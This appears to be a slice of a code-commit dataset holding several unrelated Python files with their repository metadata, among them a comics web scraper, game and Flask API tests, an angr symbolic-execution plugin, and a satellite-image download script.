allowed_domains = ["bunsencomics.com"]
start_urls = (
'http://www.bunsencomics.com/?category=Bunsen+C%C3%B3mics',
)
def parse(self, response):
for sel in response.xpath('//article'):
item = BunsenscrapperItem()
item['title'] = sel.xpath('h1/a/text()').extract()
item['link'] = sel.xpath('h1/a/@href').extract()
item['img'] = sel.css('.thumb-image').xpath('@data-src').extract()
yield item
pass
next_link = response.xpath('//a[contains(text(), "Older")]/@href').extract()
if next_link:
yield Request('http://www.bunsencomics.com' + next_link[0], self.parse)
|
unlicense
|
Python
|
23df7b77cde8b5351cf2902b8b11ee07e4b478f4
|
Add a basic smoke test to check for exceptions and programming errors.
|
BitokuOokami/PloungeMafiaToolkit
|
tests/smoke_test.py
|
tests/smoke_test.py
|
# -*- coding: utf-8 -*-
import unittest
import sys
sys.path.insert(0, '../mafia')
from game import Game
from game import Player
class TestMessenger:
def message_all_players(self, message: str):
print ('public: {message}'.format(message=message))
def message_player(self, player, message: str):
print ('{name}: {message}'.format(name=player.nickname, message=message))
class SmokeTest(unittest.TestCase):
def setUp(self):
self.messenger = TestMessenger()
def test_smoke_test(self):
game = Game('t,c,c,m', self.messenger)
player_one = Player('one', 'one')
player_two = Player('two', 'two')
player_three = Player('three', 'three')
player_four = Player('four', 'four')
game.join(player_one)
game.join(player_two)
game.join(player_three)
game.join(player_four)
game.vote('one', 'three')
game.vote('three', 'one')
game.vote('two', 'three')
game.vote('four', 'three')
game.target('one', 'two')
game.target('two', 'one')
game.target('four', 'one')
print(game.actions)
if __name__ == '__main__':
unittest.main()
|
mit
|
Python
|
|
a1f1efe712205b3bd4702a7ae3d06aa3171ad32f
|
add missing file...
|
chubbymaggie/angr,schieb/angr,axt/angr,axt/angr,angr/angr,tyb0807/angr,iamahuman/angr,iamahuman/angr,axt/angr,chubbymaggie/angr,chubbymaggie/simuvex,f-prettyland/angr,schieb/angr,tyb0807/angr,tyb0807/angr,angr/simuvex,chubbymaggie/angr,chubbymaggie/simuvex,f-prettyland/angr,chubbymaggie/simuvex,iamahuman/angr,schieb/angr,angr/angr,angr/angr,f-prettyland/angr
|
simuvex/plugins/uc_manager.py
|
simuvex/plugins/uc_manager.py
|
import logging
l = logging.getLogger('simuvex.plugins.uc_manager')
from .plugin import SimStatePlugin
class SimUCManager(SimStatePlugin):
def __init__(self, man=None):
SimStatePlugin.__init__(self)
if man:
self._uc_region_base = man._uc_region_base
self._uc_pos = man._uc_pos
else:
self._uc_region_base = 0xd0000000
self._uc_pos = 0
def assign(self):
"""
Assign a new region for under-constrained symbolic execution
:return: as ast of memory address that points to a new region
"""
ptr = self.state.se.BVV(self._uc_region_base + self._uc_pos, self.state.arch.bits)
self._uc_pos += 0x1000
return ptr
def copy(self):
return SimUCManager(man=self)
SimStatePlugin.register_default('uc_manager', SimUCManager)
|
bsd-2-clause
|
Python
|
|
e33ce5f613c2a7bb9c2c42fba695ee37d3bb66ce
|
Add integration tests
|
PoprostuRonin/memes-api
|
tests/test_flask.py
|
tests/test_flask.py
|
from main import app
import pytest
import json
@pytest.fixture
def client():
client = app.test_client()
yield client
sites = [
"/kwejk",
"/jbzd",
"/9gag",
"/9gagnsfw",
"/demotywatory",
"/mistrzowie",
"/anonimowe",
]
# This test could fail if the site changes it's schema or is not functional
@pytest.mark.parametrize("site", sites)
def test_sites(client, site):
r = client.get(site)
assert r.status == "200 OK"
data = json.loads(r.data)
assert len(data["memes"]) > 0
assert data["next_page_url"] is not None
r = client.get(data["next_page_url"])
assert r.status == "200 OK"
data = json.loads(r.data)
assert len(data["memes"]) > 0
assert data["next_page_url"] is not None
|
mit
|
Python
|
|
36a85fac06fd1bfe6934883f98b60edcbf3814be
|
Add test for scuba.utils.format_cmdline()
|
JonathonReinhart/scuba,JonathonReinhart/scuba,JonathonReinhart/scuba
|
tests/test_utils.py
|
tests/test_utils.py
|
from __future__ import print_function
from nose.tools import *
from unittest import TestCase
import logging
import shlex
from itertools import chain
from .utils import *
import scuba.utils
class TestUtils(TestCase):
def _parse_cmdline(self, cmdline):
# Strip the formatting and whitespace
lines = [l.rstrip('\\').strip() for l in cmdline.splitlines()]
# Split each line, and return a flattened list of arguments
return chain.from_iterable(map(shlex.split, lines))
def _test_format_cmdline(self, args):
# Call the unit-under-test to get the formatted command line
result = scuba.utils.format_cmdline(args)
# Parse the result back out to a list of arguments
out_args = self._parse_cmdline(result)
# Verify that they match
assert_seq_equal(out_args, args)
def test_basic(self):
'''format_cmdline works as expected'''
self._test_format_cmdline([
'something',
'-a',
'-b',
'--long', 'option text',
'-s', 'hort',
'a very long argument here that will end up on its own line because it is so wide and nothing else will fit at the default width',
'and now',
'some', 'more', 'stuff',
'and even more stuff',
])
|
mit
|
Python
|
|
424db0df3c8be8538d551bd6974a8eccee6e53cc
|
add tenki.py
|
mii012345/deep-learning
|
tenki.py
|
tenki.py
|
import urllib.request
import sys
import numpy as np
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"
a=1
b=0
x = input("Please Enter Year You Want: ")
y = input("And Enter Folder You Save File: ") + "/"
c=[]
for ii in range(1,13):
for i in range(1,32):
if i<10:
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"+x+"/0"+str(a)+"/0"+str(i)+"/fe."+x[2:]+"0"+str(a)+"0"+str(i)+"09.jpg"
title=y+str(b)+".jpg"
else:
url="http://weather.is.kochi-u.ac.jp/sat/gms.fareast/"+x+"/0"+str(a)+"/"+str(i)+"/fe."+x[2:]+"0"+str(a)+str(i)+"09.jpg"
title=y+str(b)+".jpg"
try:
urllib.request.urlretrieve(url,title)
except:
if ii == 2:
if i == 29:
ii+=1
continue
if ii == 4 or ii == 6 or ii == 9 or ii == 11:
if i == 31:
ii+=1
continue
d = str(ii)+"/"+str(i)
c = np.append(c,[d],axis=0)
continue
print(b,url)
b+=1
a+=1
print("I Was Able To Download Files About "+str(x))
print("This Is Files I Could Not Download:")
for i in c:
print(i)
|
mit
|
Python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.